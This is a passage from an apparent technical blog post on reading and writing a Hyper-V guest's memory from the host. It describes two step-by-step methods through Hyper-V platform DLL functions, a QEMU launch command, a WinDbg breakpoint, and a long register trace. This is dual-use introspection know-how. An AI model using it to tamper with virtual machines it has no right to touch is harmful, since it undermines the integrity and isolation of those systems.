<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1. translate a virtual address into a physical one using vid.dll!VidTranslateGvatoGpa and get the physical address.</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2. find the necessary GPN-list or node in the tree, comparing the start and end GPA, with the received on stage 1 physical address</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3. get VPN-list and find out the memory block offset in the address space of the qemu-system-x86_64.exe process or vmware-vmx.exe.</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4. read the corresponding memory block or write (depending on the operation).</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Option 2 (Theoretical. Does not require kernel-mode operations, but hasn’t been tested):</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1. Get physical address from virtual using winhvplatform.dll!WHvTranslateGva</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2. Scan the address space of the qemu-system-x86_64.exe or vmware-vmx.exe process, find a block, that matches the size of the RAM (hope that it will be the same without fragmentation)</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3. To consider the physical address as an offset in the process memory block</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4. Read or write, and hope that you're lucky)</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Yes, non-100% variant, but don’t required kernel mode EXO-trees parsing.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can get trace during Qemu started:</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">qemu-system-x86_64.exe -m 3072M -smp 1 -drive file= Win1020H1.gcow2, index=0, media=disk, cache=writeback -accel whpx</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> with WinDBG command</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bp winhvr!WinHvMapGpaPagesSpecial "r rcx, rdx,r8,r9;g"</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0: kd> g</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=0000000000000000 r8=0000000000080400 r9=00000000000c0000</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000fffc0 r8=0000000000080400 r9=0000000000000040</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=0000000000000000 r8=0000000000080400 r9=00000000000000c0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000c0 r8=0000000000080400 r9=0000000000000020</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000e0 r8=0000000000080400 r9=0000000000000020</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=0000000000000100 r8=0000000000080400 r9=00000000000bff00</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=0000000000000000 r8=0000000000080400 r9=00000000000000a0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000c0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000d0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000e0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000f0 r8=0000000000080400 r9=00000000000bff10</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000c0 r8=0000000000080400 r9=00000000000bff40</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000fd000 r8=0000000000080400 r9=0000000000001000</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000febe0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000feb80 r8=0000000000080400 r9=0000000000000040</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000c0 r8=0000000000080400 r9=000000000000000b</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000cb r8=0000000000080400 r9=0000000000000003</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000ce r8=0000000000080400 r9=0000000000000002</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000d0 r8=0000000000080400 r9=0000000000000020</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000f0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=0000000000000100 r8=0000000000080400 r9=00000000000bff00</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000ce r8=0000000000080400 r9=000000000000001a</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000e8 r8=0000000000080400 r9=0000000000000008</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000005 rdx=00000000000000a0 r8=0000000000080400 r9=0000000000000010</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
